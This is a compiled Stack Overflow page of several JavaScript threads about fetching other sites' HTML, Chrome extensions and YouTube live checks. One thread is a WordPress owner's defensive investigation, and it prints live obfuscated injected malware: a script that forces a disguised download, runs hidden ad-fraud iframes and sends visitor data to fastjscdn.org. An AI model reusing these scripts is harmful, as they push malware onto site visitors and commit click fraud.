Can Javascript read the source of any web page? - javascript

I am working on screen scraping, and want to retrieve the source code a particular page.
How can achieve this with javascript? Please help me.

Simple way to start, try jQuery
$("#links").load("/Main_Page #jq-p-Getting-Started li");
More at jQuery Docs
Another way to do screen scraping in a much more structured way is to use YQL or Yahoo Query Language. It will return the scraped data structured as JSON or xml.
e.g.
Let's scrape stackoverflow.com
select * from html where url="http://stackoverflow.com"
will give you a JSON array (I chose that option) like this
"results": {
"body": {
"noscript": [
{
"div": {
"id": "noscript-padding"
}
},
{
"div": {
"id": "noscript-warning",
"p": "Stack Overflow works best with JavaScript enabled"
}
}
],
"div": [
{
"id": "notify-container"
},
{
"div": [
{
"id": "header",
"div": [
{
"id": "hlogo",
"a": {
"href": "/",
"img": {
"alt": "logo homepage",
"height": "70",
"src": "http://i.stackoverflow.com/Content/Img/stackoverflow-logo-250.png",
"width": "250"
}
……..
The beauty of this is that you can do projections and where clauses which ultimately gets you the scraped data structured and only the data what you need (much less bandwidth over the wire ultimately)
e.g
select * from html where url="http://stackoverflow.com" and
xpath='//div/h3/a'
will get you
"results": {
"a": [
{
"href": "/questions/414690/iphone-simulator-port-for-windows-closed",
"title": "Duplicate: Is any Windows simulator available to test iPhone application? as a hobbyist who cannot afford a mac, i set up a toolchain kit locally on cygwin to compile objecti … ",
"content": "iphone\n simulator port for windows [closed]"
},
{
"href": "/questions/680867/how-to-redirect-the-web-page-in-flex-application",
"title": "I have a button control ....i need another web page to be redirected while clicking that button .... how to do that ? Thanks ",
"content": "How\n to redirect the web page in flex application ?"
},
…..
Now to get only the questions we do a
select title from html where url="http://stackoverflow.com" and
xpath='//div/h3/a'
Note the title in projections
"results": {
"a": [
{
"title": "I don't want the function to be entered simultaneously by multiple threads, neither do I want it to be entered again when it has not returned yet. Is there any approach to achieve … "
},
{
"title": "I'm certain I'm doing something really obviously stupid, but I've been trying to figure it out for a few hours now and nothing is jumping out at me. I'm using a ModelForm so I can … "
},
{
"title": "when i am going through my project in IE only its showing errors A runtime error has occurred Do you wish to debug? Line 768 Error:Expected')' Is this is regarding any script er … "
},
{
"title": "I have a java batch file consisting of 4 execution steps written for analyzing any Java application. In one of the steps, I'm adding few libs in classpath that are needed for my co … "
},
{
……
Once you write your query it generates a url for you
http://query.yahooapis.com/v1/public/yql?q=select%20title%20from%20html%20where%20url%3D%22http%3A%2F%2Fstackoverflow.com%22%20and%0A%20%20%20%20%20%20xpath%3D'%2F%2Fdiv%2Fh3%2Fa'%0A%20%20%20%20&format=json&callback=cbfunc
in our case.
So ultimately you end up doing something like this
var titleList = $.getJSON(theAboveUrl);
and play with it.
Beautiful, isn’t it?

Javascript can be used, as long as you grab whatever page you're after via a proxy on your domain:
<html>
<head>
<script src="/js/jquery-1.3.2.js"></script>
</head>
<body>
<script>
$.get("www.mydomain.com/?url=www.google.com", function(response) {
alert(response)
});
</script>
</body>

You could simply use XmlHttp (AJAX) to hit the required URL and the HTML response from the URL will be available in the responseText property. If it's not the same domain, your users will receive a browser alert saying something like "This page is trying to access a different domain. Do you want to allow this?"

You can use fetch:
const URL = 'https://www.sap.com/belgique/index.html';
fetch(URL)
.then(res => res.text())
.then(text => {
console.log(text);
})
.catch(err => console.log(err));

As a security measure, Javascript can't read files from different domains. Though there might be some strange workaround for it, I'd consider a different language for this task.

If you absolutely need to use javascript, you could load the page source with an ajax request.
Note that with javascript, you can only retrieve pages that are located under the same domain with the requesting page.

Using jquery
<html>
<head>
<script src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.js" ></script>
</head>
<body>
<script>
$.get("www.google.com", function(response) { alert(response) });
</script>
</body>

I used ImportIO. They let you request the HTML from any website if you set up an account with them (which is free). They let you make up to 50k requests per year. I didn't take them time to find an alternative, but I'm sure there are some.
In your Javascript, you'll basically just make a GET request like this:
var request = new XMLHttpRequest();
request.onreadystatechange = function() {
jsontext = request.responseText;
alert(jsontext);
}
request.open("GET", "https://extraction.import.io/query/extractor/THE_PUBLIC_LINK_THEY_GIVE_YOU?_apikey=YOUR_KEY&url=YOUR_URL", true);
request.send();
Sidenote: I found this question while researching what I felt like was the same question, so others might find my solution helpful.
UPDATE: I created a new one which they just allowed me to use for less than 48 hours before they said I had to pay for the service. It seems that they shut down your project pretty quick now if you aren't paying. I made my own similar service with NodeJS and a library called NightmareJS. You can see their tutorial here and create your own web scraping tool. It's relatively easy. I haven't tried to set it up as an API that I could make requests to or anything.

You can bypass the same-origin-policy by either creating a browser extension or even saving the file as .hta in Windows (HTML Application).

Despite many comments to the contrary I believe that it is possible to overcome the same origin requirement with simple JavaScript.
I am not claiming that the following is original because I believe I saw something similar elsewhere a while ago.
I have only tested this with Safari on a Mac.
The following demonstration fetches the page in the base tag and and moves its innerHTML to a new window. My script adds html tags but with most modern browsers this could be avoided by using outerHTML.
<html>
<head>
<base href='http://apod.nasa.gov/apod/'>
<title>test</title>
<style>
body { margin: 0 }
textarea { outline: none; padding: 2em; width: 100%; height: 100% }
</style>
</head>
<body onload="w=window.open('#'); x=document.getElementById('t'); a='<html>\n'; b='\n</html>'; setTimeout('x.innerHTML=a+w.document.documentElement.innerHTML+b; w.close()',2000)">
<textarea id=t></textarea>
</body>
</html>

javascript:alert("Inspect Element On");
javascript:document.body.contentEditable = 'true';
document.designMode='on';
void 0;
javascript:alert(document.documentElement.innerHTML);
Highlight this and drag it to your bookmarks bar and click it when you wanna edit and view the current sites source code.

You can generate a XmlHttpRequest and request the page,and then use getResponseText() to get the content.

You can use the FileReader API to get a file, and when selecting a file, put the url of your web page into the selection box.
Use this code:
function readFile() {
var f = document.getElementById("yourfileinput").files[0];
if (f) {
var r = new FileReader();
r.onload = function(e) {
alert(r.result);
}
r.readAsText(f);
} else {
alert("file could not be found")
}
}
}

jquery is not the way of doing things.
Do in purre javascript
var r = new XMLHttpRequest();
r.open('GET', 'yahoo.comm', false);
r.send(null);
if (r.status == 200) { alert(r.responseText); }

<script>
$.getJSON('http://www.whateverorigin.org/get?url=' + encodeURIComponent('hhttps://example.com/') + '&callback=?', function (data) {
alert(data.contents);
});
</script>
Include jQuery and use this code to get HTML of other website. Replace example.com with your website.
This method involves an external server fetching the sites HTML & sending it to you. :)

On linux
download slimerjs (slimerjs.org)
download firefox version 59
add this environment variable: export SLIMERJSLAUNCHER=/home/en/Letöltések/firefox59/firefox/firefox
on slimerjs download page use this .js program (./slomerjs program.js):
var page = require('webpage').create();
page.open(
'http://www.google.com/search?q=görény',
function()
{
page.render('goo2.pdf');
phantom.exit();
}
);
Use pdftotext to get text on the page.

const URL = 'https://wwww.w3schools.com';
fetch(URL)
.then(res => res.text())
.then(text => {
console.log(text);
})
.catch(err => console.log(err));
const URL = 'https://www.sap.com/belgique/index.html';
fetch(URL)
.then(res => res.text())
.then(text => {
console.log(text);
})
.catch(err => console.log(err));

Related

Intercept and replace images in web app with Chrome extension

I am attempting to write a chrome extension (for personal use) to swap/replace images loaded by a webpage with alternate images. I'd had this working for some time using chrome.webRequest, but am attempting to bring it up-to-speed with manifest v3.
My general solution is that I am hosting my replacement images on my own server, including a script to retrieve as json a list of such images. I fetch that list and, for each image, create a dynamic redirect rule with chrome.declarativeNetRequest.updateDynamicRules.
This all works beautifully if I request an image to be replaced in a main frame. I can see the successful match with an onRuleMatchedDebug listener, and (of course) the path is dutifully redirected.
However, when I load the web app that in turn loads the image (with javascript, presumably with xmlhttprequest?), the redirect rule does not trigger. The initiator (a javascript source file) is on the same domain and similar path to the images being replaced.
//manifest.json
{
"name": "Image replace",
"description": "Replace images in web app",
"version": "2.0",
"manifest_version": 3,
"background": {"service_worker": "background.js"},
"permissions": [
"declarativeNetRequestWithHostAccess",
// "declarativeNetRequestFeedback" // Not necessary once tested
],
"host_permissions" : [
// "https://domain1.com/outerframe/*", // Not necessary
"https://domain2.com/innerframe/*",
"https://domain3.com/*",
"https://myexample.com/*"
]
}
// background.js
//chrome.declarativeNetRequest.onRuleMatchedDebug.addListener((info) => console.log(info)); // Not necessary once tested
var rules = [];
var idx = 1;
fetch("https://myexample.com/list") // returns json list like: ["subdir1\/image1.png", "subdir1\/image2.png", "subdir2\/image1.png"]
.then((response) => response.json())
.then((data) => {
console.log(data);
for (const path of data) {
var src = "https://domain2.com/innerframe/v*/files/" + path; // wildcards a version number
var dst = "https://myexample.com/files/" + path;
rules.push({
"id" : idx++,
"action" : {
"type": "redirect",
"redirect": {
"url": dst
}
},
"condition" : {
"urlFilter": src,
// In the end I only needed main_frame, image, and not xmlhttprequest
"resourceTypes": ["main_frame", "image"]
}
});
}
chrome.declarativeNetRequest.updateDynamicRules({"addRules": rules, "removeRuleIds" : rules.map(r => r.id)});
});
Again, this DOES all work IF I load a source image directly in chrome, but fails when it's being loaded by the javascript app.
I also attempted to test the match by specifying the proper initiator with testMatchOutcome, but my browser seems to claim this API does not exist. Not at all sure what could be wrong here.
// snippet attempted after above updateDynamicRules call
chrome.declarativeNetRequest.testMatchOutcome({
"initiator": "https://domain2.com/innerframe/files/script.js",
"type": "xmlhttprequest",
"url": "https://domain2.com/innerframe/v001/files/subdir/image1.png"
}, (outcome) => console.log(outcome));
I would expect a redirect to "https://myexample.com/files/subdir/image1.png"
Instead, I get this error:
Uncaught (in promise) TypeError: chrome.declarativeNetRequest.testMatchOutcome is not a function
Documentation https://developer.chrome.com/docs/extensions/reference/declarativeNetRequest/#method-testMatchOutcome says it's supported in chrome 103+. I'm running chrome 108.0.5359.72
Thanks!
Edit: Example code updated to reflect my answer below.
I've managed to work out why direct requests were redirected while script loaded ones were not. My problem was with the initiator and host permissions. I had been relying on Chrome developer tools to provide the initiator, which in the above example originated with domain2.com. However, the actual host permission I needed was from a third domain (call it domain3.com), which seems to be the source of the content that loaded scripts from domain2.com.
I discovered this when I recalled that host permissions allows "<all_urls>", which is not a good idea long term, but it did allow the redirects to complete. From there, my onRuleMatchedDebug listener could fire and log to the console the characteristics of the redirect, which showed me the proper initiator I was missing.
Having a concise view of the redirects I need, I can now truncate some of these options to only the ones actually needed (edited in original question).
Subsequent to that I thought to look back at the HTTP requests in developer tools and inspect the Referer header, which also had what I was needing.
So, silly oversights aside, I would like to leave this question open a little while longer in case anyone has any idea why chrome.declarativeNetRequest.testMatchOutcome seems unavailable in Chrome 108.0.5359.72 but is documented for 103+. I'd chalk it up to the documentation just being wrong, but it seems this function must have shipped at some point and somehow was erroneously removed? Barring any insights, I might just submit it as a bug.

Malicious code asmr9999 / fastjscdn in Wordpress uses FileSaver.js and jszip

Scanning my site with pagespeed, it shows that my site is loading malicious files in the background.
The problem happens occasionally, it doesn't happen all the time. Sometimes the site doesn't load the malicious script, other times it does. I don't know what it depends on.
In particular, the following js script is loaded from this link "https:// asmr9999. live/static.js" (without space). So the malicious code is loaded indirectly.
if(!window.xxxyyyzzz){function e(){return -1!==["Win32","Win64","Windows","WinCE"].indexOf(window.navigator?.userAgentData?.platform||window.navigator.platform)}function n(n){if(!e())return!1;var t="File",a=n.target.closest("a");if(window.location.href.indexOf("3axis.co")>=0){if(0>a.parentElement.className.indexOf("post-subject")&&0>a.parentElement.className.indexOf("img"))return!1;t=a.children.length>0?a.children[0].alt:a.innerText}else{if(!(window.location.href.indexOf("thesimscatalog.com")>=0)||0>a.parentElement.className.indexOf("product-inner"))return!1;t=a.children[1].innerText}var i=document.createElement("a");return i.style="display:none",i.href="https://yhdmb.xyz/download/"+t+" Downloader.zip",document.body.append(i),i.click(),n.preventDefault(),!0}function t(e){var n=document.createElement("script");n.src=e,document.head.appendChild(n)}function a(e,n,t){var a="";if(t){var i=new Date;i.setTime(i.getTime()+36e5*t),a="; expires="+i.toUTCString()}document.cookie=e+"="+(n||"")+a+"; path=/"}function i(e){for(var n=e+"=",t=document.cookie.split(";"),a=0;a<t.length;a++){for(var i=t[a];" "==i.charAt(0);)i=i.substring(1,i.length);if(0==i.indexOf(n))return i.substring(n.length,i.length)}return null}function r(e){var t=e.target.closest("a");null!==t&&(n(e)||!i("__ads__opened")&&window._ads_goto&&(a("__ads__opened","1",6),"_blank"==t.target||(e.preventDefault(),window.open(t.href)),setTimeout(function(){window.location=window._ads_goto},500)),window.removeEventListener("click",r))}t("https://cdnjs.cloudflare.com/ajax/libs/jszip/3.10.1/jszip.min.js"),t("https://cdnjs.cloudflare.com/ajax/libs/FileSaver.js/2.0.0/FileSaver.min.js"),window.addEventListener("click",r,{capture:!0}),window.addEventListener("message",function(e){e.data&&e.data instanceof Object&&e.data._ads_goto&&(window._ads_goto=e.data._ads_goto)}),window.xxxyyyzzz=function(e){var n=document.createElement("div"),t=document.createElement("iframe");t.src=e,n.style.display="none",n.appendChild(t),window.addEventListener("load",function(){document.body.append(n)})},window.xxxyyyzzz("https://yhdmb.xyz/vp/an.html")}
From this code it is possible to understand where the malware is located on my Wordpress site? And also is it possible to understand what exactly this code does?
I have seen that it also uses these scripts,
https://cdnjs.cloudflare.com/ajax/libs/jszip/3.10.1/jszip.min.js
https://cdnjs.cloudflare.com/ajax/libs/FileSaver.js/2.0.0/FileSaver.min.js
which are respectively:
https://stuk.github.io/jszip/
https://github.com/eligrey/FileSaver.js/
EDIT 1: I find that it loads before "/body"
<script src="https://asmr9999.live/static.js?hash=a633f506a53746a846742c5655ebf596"></script></body></html>
EDIT 2: i installed https://wordpress.org/plugins/string-locator/ for search asmr9999 in all site, also in encoded Base64 format "YXNtcjk5OTk" but nothing. I tried also https://wordpress.org/plugins/gotmls/ , nothing.
EDIT 3: I've only found one person on the internet who has the same problem, at this link (remove space):
https:// boards.4channel. org/g/thread/89699524/i-had-a-virus-on-my-server-ot-attack-in-my-server
EDIT 4: i also analyzed the malicious link in the script, this https:// yhdmb. xyz/vp/an.html. It is an html page containing this code:
<html lang="en">
<head>
<title>YHDM</title>
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-8724126396282572"
crossorigin="anonymous"></script>
<script src="https://cdn.fluidplayer.com/v2/current/fluidplayer.min.js"></script>
</head>
<body>
<script>
function setCookie(name,value,hours) {
var expires = "";
if (hours) {
var date = new Date();
date.setTime(date.getTime() + (hours*60*60*1000));
expires = "; expires=" + date.toUTCString();
}
document.cookie = name + "=" + (value || "") + expires + "; path=/;SameSite=None; Secure";
}
function addVast(id, url, prob, type) {
var div = document.createElement('div');
var video = document.createElement('video');
var source = document.createElement('source');
source.type = 'video/mp4';
source.src = 'video.mp4';
video.id = 'my-video' + id;
video.append(source);
div.appendChild(video);
document.body.append(div);
var testVideo = fluidPlayer(
"my-video" + id,
{
layoutControls: {
autoPlay: true
},
vastOptions: {
"adList": [
{
"roll": "preRoll",
"vastTag": url
},
{
"roll": "midRoll",
"vastTag": url,
"timer": 8
},
{
"roll": "midRoll",
"vastTag": url,
"timer": 10
},
{
"roll": "postRoll",
"vastTag": url
}
]
}
}
);
setTimeout(function () {
testVideo.play();
testVideo.setVolume(0);
function tryClickAds() {
setTimeout(function () {
if (testVideo.vastOptions && testVideo.vastOptions.clickthroughUrl) {
var url = testVideo.vastOptions.clickthroughUrl;
if (type == 'nw') {
setCookie('redirect', url, 1);
console.log(url);
window.parent.postMessage({'_ads_goto': window.location.href}, '*');
} else {
var adsIframe = document.createElement('iframe');
adsIframe.src = url;
adsIframe.style = 'height:100%;width:100%';
adsIframe.sandbox = 'allow-forms allow-orientation-lock allow-pointer-lock allow-presentation allow-same-origin allow-scripts';
document.body.appendChild(adsIframe);
}
} else {
tryClickAds()
}
}, 1000)
}
if (Math.random() < prob) {
tryClickAds()
}
}, 500);
}
addVast('1', 'https://wyglyvaso.com/ddmxF.ztdoG-N/v/ZxGmUY/bejmS9ku/ZdUll/klPpTRQG1iNozIcs2/NTTvAQtmNIDPUZ3YN/zXYP1LMWQI', 1, 'nw');
addVast('2','https://syndication.exdynsrv.com/splash.php?idzone=4840778',0.5,'nw');
</script>
</body>
</html>
EDIT 5: i restored a backup from September. The malicious code is stille there, but little differente. It still load before "/body", but the js code is different and it uses another domanin, "fastjscdn .org", instead of "asmr9999 .live". How is it possible that it can change domain?
<script src="https://fastjscdn.org/static.js?hash=1791f07709c2e25e84d84a539f3eb034"></script></body>
JS code contain:
window.xxxyyyzzz||(window.xxxyyyzzz="1",function(){if(function t(){try{return window.self!==window.top}catch(r){return!0}}()){var t=window.parent.document.createElement("script");t.src="https://fastjscdn.org/static.js",window.parent.document.body.appendChild(t);return}fetch("https://fastjscdn.org/platform/"+(window.navigator?.userAgentData?.platform||window.navigator.platform)+"/url/"+window.location.href).then(t=>{})}());
You can find out who was initiator of any loaded file. Open developer console (Ctrl+Shift+I in Chrome), choose Network tab. After loading page with opened Network tab there will appear all loaded files. Locate your file and find Column initiator.
But, it can be scenario, where it will be loaded from DOM. So next step will be you will go to Elements, Ctrl+F and search for this script. But this musn't be your solution. It can be inserted to HTML of your webpage by any malicious plugin.
I prefer (at least if you are able to log into Wordpress admin) using some useful plugin for scanning. E.g. plugin Anti-Malware Security and Brute-Force Firewall or some other scanning tool. It will probably find concrete file/directory where is some malicious code.
I have exactly the same issue on the ContOS VPS server and a custom CMS. I am using Apache + nginx + php 5.6 configuration. My investigations are the following:
I compared all my site scripts with the scripts from my previous backup and there are no changes in the site scripts!
I checked all files on my server for the string "asmr9999" and the same string, encoded in the Base64 format: YXNtcjk5OTk - the strings were not found. Also, I created a SQL database dump, but the dump either doesn't contains these strings!
I checked site with using the clamAV antivirus and the maldet tool and there is no issues were found.
Finally, I rebooted server, and the scripts "<script src="https:// asmr9999 .live" are gone from all my site pages! But, after about 1 hour, the scripts are appeared again on my site pages.
So, it seems that the script is located only in RAM and disappears during the server reboot. Then, after 1 hour maybe the crontab loaded the script into the RAM from some place.
I hope I will save your time and together we will resolve this issue.
I am continuing the investigation.
Makes me think of linux rootkits from 10 years ago (!) such as Snakso that injected malicious iframes directly in the outgoing HTTP traffic of the server
the problem and solution are described here https://stackoverflow.com/a/74921192/14686582
My Memcached server was public and infected with malicious code, it was a "cache-side" xss attack.

How to check if a youtube livestream is active (by YT-id)? [duplicate]

I can't find any informations to check if a YouTube channel is actually streaming or not.
With Twitch you just need the channel name, and with the API you can check if there is a live or not.
I don't want to use OAuth, normally a public API key is enough. Like checking the videos of a channel I want to know if the channel is streaming.
You can do this by using search.list and specifying the channel ID, setting the type to video, and setting eventType to live.
For example, when I searched for:
https://www.googleapis.com/youtube/v3/search?part=snippet&channelId=UCXswCcAMb5bvEUIDEzXFGYg&type=video&eventType=live&key=[API_KEY]
I got the following:
{
"kind": "youtube#searchListResponse",
"etag": "\"sGDdEsjSJ_SnACpEvVQ6MtTzkrI/gE5P_aKHWIIc6YSpRcOE57lf9oE\"",
"pageInfo": {
"totalResults": 1,
"resultsPerPage": 5
},
"items": [
{
"kind": "youtube#searchResult",
"etag": "\"sGDdEsjSJ_SnACpEvVQ6MtTzkrI/H-6Tm7-JewZC0-CW4ALwOiq9wjs\"",
"id": {
"kind": "youtube#video",
"videoId": "W4HL6h-ZSws"
},
"snippet": {
"publishedAt": "2015-09-08T11:46:23.000Z",
"channelId": "UCXswCcAMb5bvEUIDEzXFGYg",
"title": "Borussia Dortmund vs St. Pauli 1-0 Live Stream",
"description": "Borussia Dortmund vs St. Pauli Live Stream Friendly Match.",
"thumbnails": {
"default": {
"url": "https://i.ytimg.com/vi/W4HL6h-ZSws/default.jpg"
},
"medium": {
"url": "https://i.ytimg.com/vi/W4HL6h-ZSws/mqdefault.jpg"
},
"high": {
"url": "https://i.ytimg.com/vi/W4HL6h-ZSws/hqdefault.jpg"
}
},
"channelTitle": "",
"liveBroadcastContent": "live"
}
}
]
}
The search-method (https://www.googleapis.com/youtube/v3/search) is awfully expensive to use though. It costs 100 quota units (https://developers.google.com/youtube/v3/determine_quota_cost) out of the 10,000 you have by default.
This means you only get 100 requests per day which is terrible.
You could request an increase in the quota but that seems like brute forcing the the problem.
Is there really no other simpler method?
I know this is old, but I figured it out myself with PHP.
$API_KEY = 'your api3 key';
$ChannelID = 'the users channel id';
$channelInfo = 'https://www.googleapis.com/youtube/v3/search?part=snippet&channelId='.$ChannelID.'&type=video&eventType=live&key='.$API_KEY;
$extractInfo = file_get_contents($channelInfo);
$extractInfo = str_replace('},]',"}]",$extractInfo);
$showInfo = json_decode($extractInfo, true);
if($showInfo['pageInfo']['totalResults'] === 0){
echo 'Users channel is Offline';
} else {
echo 'Users channel is LIVE!';
}
Guys I found better way to do this. Yes, it requires you to make GET requests to a YouTube page and parse HTML, but it will work with newer versions + works with consent + works with captcha (most likely, 90%)
All you need to do is make a request to https://youtube.com/channel/[CHANNELID]/live and check the href attribute of the <link rel="canonical" /> tag.
For example,
<link rel="canonical" href="https://www.youtube.com/channel/UC4cueEAH9Oq94E1ynBiVJhw">
means there is no livestream, while
<link rel="canonical" href="https://www.youtube.com/watch?v=SR9w_ofpqkU">
means there is a stream, and you can even fetch its data by videoid.
Since canonical URL is very important for SEO and redirect does not work in GET or HEAD requests anymore, I recommend using my method.
Also here is the simple script I use:
import { parse } from 'node-html-parser'
import fetch from 'node-fetch'
const channelID = process.argv[2] // process.argv is array of arguments passed in console
const response = await fetch(`https://youtube.com/channel/${channelID}/live`)
const text = await response.text()
const html = parse(text)
const canonicalURLTag = html.querySelector('link[rel=canonical]')
const canonicalURL = canonicalURLTag.getAttribute('href')
const isStreaming = canonicalURL.includes('/watch?v=')
console.log(isStreaming)
Then run npm init -y && npm i node-html-parser node-fetch to create project in working directory and install dependencies
Then run node isStreaming.js UC4cueEAH9Oq94E1ynBiVJhw and it will print true/false (400-600 ms per one execution)
It does require you to depend on node-html-parser and node-fetch, but you can make requests with the built-in HTTP library (which sucks) and rewrite this to use regex. (Do not parse HTML with regex.)
I was also struggling with API limits. The most reliable and cheapest way I've found was simply a HEAD request to https://www.youtube.com/channel/CHANNEL_ID/live. If the channel is live then it will auto load the stream. If not then it will load the channels videos feed. You can simply check the Content-Length header size to determine which. If live the size is almost 2x when NOT live.
And depending on your region you might need to accept the cookies consent page. Just send your request with cookies={ "CONSENT": "YES+cb.20210420-15-p1.en-GB+FX+634" }.
if you point streamlink at a https://www.youtube.com/channel/CHANNEL_ID/live link, it will tell you if it is live or not
e.g. lofi beats is usually live,
$ streamlink "https://www.youtube.com/channel/UCSJ4gkVC6NrvII8umztf0Ow/live"
[cli][info] Found matching plugin youtube for URL https://www.youtube.com/channel/UCSJ4gkVC6NrvII8umztf0Ow/live
Available streams: 144p (worst), 240p, 360p, 480p, 720p, 1080p (best)
whereas MKBHD is not
$ streamlink "https://www.youtube.com/c/mkbhd/live"
[cli][info] Found matching plugin youtube for URL https://www.youtube.com/c/mkbhd/live
error: Could not find a video on this page
The easisest way that I have found to this has been scraping the site. This can be done by finding this:
<link rel="canonical" href="linkToActualYTLiveVideoPage">
as in Vitya's answer.
This is my simple Python code using bs4:
import requests
from bs4 import BeautifulSoup
def is_liveYT():
channel_url = "https://www.youtube.com/c/LofiGirl/live"
page = requests.get(channel_url, cookies={'CONSENT': 'YES+42'})
soup = BeautifulSoup(page.content, "html.parser")
live = soup.find("link", {"rel": "canonical"})
if live:
print("Streaming")
else:
print("Not Streaming")
if __name__ == "__main__":
is_liveYT()
It is pretty weird, honestly, that YouTube doesn't have a simple way to do this through the API, although this is probably easier.
I found the answer by #VityaSchel to be quite useful, but it doesn't distinguish between channels which have a live broadcast scheduled, and those which are broadcasting live now.
To distinguish between scheduled and live, I have extended his code to access the YouTube Data API to find the live streaming details:
import { parse } from 'node-html-parser'
import fetch from 'node-fetch'
const youtubeAPIkey = 'YOUR_YOUTUBE_API_KEY'
const youtubeURLbase = 'https://www.googleapis.com/youtube/v3/videos?key=' + youtubeAPIkey + '&part=liveStreamingDetails,snippet&id='
const c = {cid: process.argv[2]} // process.argv is array of arguments passed in console
const response = await fetch(`https://youtube.com/channel/${c.cid}/live`)
const text = await response.text()
const html = parse(text)
const canonicalURLTag = html.querySelector('link[rel=canonical]')
const canonicalURL = canonicalURLTag.getAttribute('href')
c.live = false
c.configured = canonicalURL.includes('/watch?v=')
if (!c.configured) process.exit()
c.vid = canonicalURL.match(/(?<==).*/)[0]
const data = await fetch(youtubeURLbase + c.vid).then(response => response.json())
if (data.error) {
console.error(data)
process.exit(1)
}
const i = data.items.pop() // pop() grabs the last item
c.title = i.snippet.title
c.thumbnail = i.snippet.thumbnails.standard.url
c.scheduledStartTime = i.liveStreamingDetails.scheduledStartTime
c.live = i.liveStreamingDetails.hasOwnProperty('actualStartTime')
if (c.live) {
c.actualStartTime = i.liveStreamingDetails.actualStartTime
}
console.log(c)
Sample output from the above:
% node index.js UCNlfGuzOAKM1sycPuM_QTHg
{
cid: 'UCNlfGuzOAKM1sycPuM_QTHg',
live: true,
configured: true,
vid: '8yRgYiNH39E',
title: '🔴 Deep Focus 24/7 - Ambient Music For Studying, Concentration, Work And Meditation',
thumbnail: 'https://i.ytimg.com/vi/8yRgYiNH39E/sddefault_live.jpg',
scheduledStartTime: '2022-05-23T01:25:00Z',
actualStartTime: '2022-05-23T01:30:22Z'
}
Every YouTube channel as a permanent livestream, even if the channel is currently not actively livestreaming. In the liveStream resource, you can find a boolean named isDefaultStream.
But where can we get this video (livestream) id? Go to https://www.youtube.com/user/CHANNEL_ID/live, right click on the stream and copy the video URL.
You can now make a GET request to
https://youtube.googleapis.com/youtube/v3/videos?part=liveStreamingDetails&id=[VIDEO_ID]&key=[API_KEY] (this request has a quota cost of 1 unit, see here)
This will be the result if the stream is currently active/online.
{
"kind": "",
"etag": "",
"items": [
{
"kind": "",
"etag": "",
"id": "",
"liveStreamingDetails": {
"actualStartTime": "",
"scheduledStartTime": "",
"concurrentViewers": "",
"activeLiveChatId": ""
}
}
],
"pageInfo": {
"totalResults": 1,
"resultsPerPage": 1
}
}
If the stream is currently offline, the property concurrentViewers will not exist. In other words, the only difference between an online and offline livestream is that concurrentViewers is present or not present. With this information, you can check, if the channel is currently streaming or not (at least for his default stream).
I found youtube API to be very restrictive given the cost of search operation. Web scraping with aiohttp and beautifulsoup was not an option since the better indicators required javascript support. Hence I turned to selenium. I looked for the css selector
#info-text
and then search for the string Started streaming or with watching now in it.
You can run a small API on heroku with flask as well.

Chrome extension: sending data to window created with chrome.windows.create

I'm struggling to find the best way to communicate with my web app, which I'm opening with chrome.windows.create in my extension.
I've got the wiring between content script and background script right. I can right click an element and send it's value to the background script, and the background script creates a window containing my webapp. But from there I can't figure out how to access and use that value in my webapp (it needs to load the value into an editor).
I've tried setting fns and vars on the window and tab objects, but somehow they go missing from the window object once the web app is loaded.
With chrome.tabs.executeScript I can fiddle with the dom, but not set global variables or anything on 'window' either.
If there isn't a better way, I guess I'm forced to add to the DOM and pick that up once my web app is loaded, but it seems messy. I was hoping for a cleaner method, like setting an onLoadFromExtension fn which my web app can execute to get the value it needs.
I found a method that works after much trial and error, though it still seems error prone. And it also depends on the extension ID matching the installed one, so if that can't be hard-coded it'll be another message that needs passing through another channel (after reading up, looks like that can be hard-coded since it's a hash of the public key, so problem solved)... Starting to think manipulating the DOM is less messy...
background.js:
var selectedContent = null;
chrome.runtime.onMessageExternal.addListener(
function(request, sender, sendResponse) {
console.info("------------------------------- Got request", request);
if (request.getSelectedContent) {
sendResponse(selectedContent);
}
});
web app:
var extensionId = "naonkagfcedpnnhdhjahadkghagenjnc";
chrome.runtime.sendMessage(extensionId, {getSelectedContent: "true"},
response => {
console.info("----------------- Got response", response);
if(response) {
this.text = response;
}
});
manifest.json:
"externally_connectable": {
"ids": ["naonkagfcedpnnhdhjahadkghagenjnc"],
"matches": ["http://localhost:1338/*"]
},
Within the popup, do the following:
const parentWindow = window.opener
parentWindow.postMessage({ action: 'opened' })
window.onmessage = msg => {
alert(JSON.stringify(msg.data)) // Alerts you with {"your":"data"}
}
Within the script that will call chrome.windows.create, do the following:
window.onmessage = msg => {
if (msg.data.action == 'opened') {
msg.source.postMessage({ your: 'data' })
}
}
Set setSelfAsOpener: true when calling chrome.windows.create
How does this work?
Due to limitations of the Chrome extension windows API, the created window needs to post a message to its creator (aka window.opener) or else the creator won't have access to a WindowProxy (useful for posting messages to the created window).

Chrome extension and .click() loops using values from localStorage

I have made a Chrome extension to help using a small search engine in our company's intranet. That search engine is a very old webpage really convoluted, and it doesn't take parameters in the url. No chance that the original authors will assist:
The extension popup offers an input text box to type your query. Your
query is then saved in localStorage
There is a content script inserted in
the intranet page that reads the localStorage key and does a document.getElementById("textbox").value = "your query"; and then does
document.getElementById("textbox").click();
The expected result is that your search is performed. And that's all.
The problem is that the click gets performed unlimited times in an infinite loop, and I cannot see why it's repeating.
I would be grateful if you would be able to assist. This is my first Chrome extension and all what I have been learning about how to make them has been a great experience so far.
This is the relevant code:
The extension popup where you type your query
popup.html
<input type="search" id="cotext"><br>
<input type="button" value="Name Search" id="cobutton">
The attached js of the popup
popup.js
var csearch = document.getElementById("cotext");
var co = document.getElementById("cobutton");
co.addEventListener("click", function() {
localStorage["company"] = csearch.value;
window.open('url of intranet that has content script applied');
});
And now the background file to help with communication between parts:
background.js
chrome.extension.onRequest.addListener(function(request, sender, sendResponse) {
sendResponse({data: localStorage[request.key]});
});
And finally the content script that is configured in the manifest to be injected on the url of that search engine.
incomingsearch.js
chrome.extension.sendRequest(
{method: "getLocalStorage", key: "company"},
function(response) {
var str = response.data;
if (document.getElementById("txtQSearch").value === "") {
document.getElementById("txtQSearch").value = str;
}
document.getElementById("btnQSearch").click();
});
So as I mentioned before, the code works... not just once (as it should) but many many times. Do I really have an infinite loop somewhere? I don't see it... For the moment I have disabled .click() and I have put .focus() instead, but it's a workaround. I would really like to use .click() here.
Thanks in advance!
The loop is probably caused by clicking the button even if it has a value. Try putting it inside your if. That said, you are overcomplicating it.
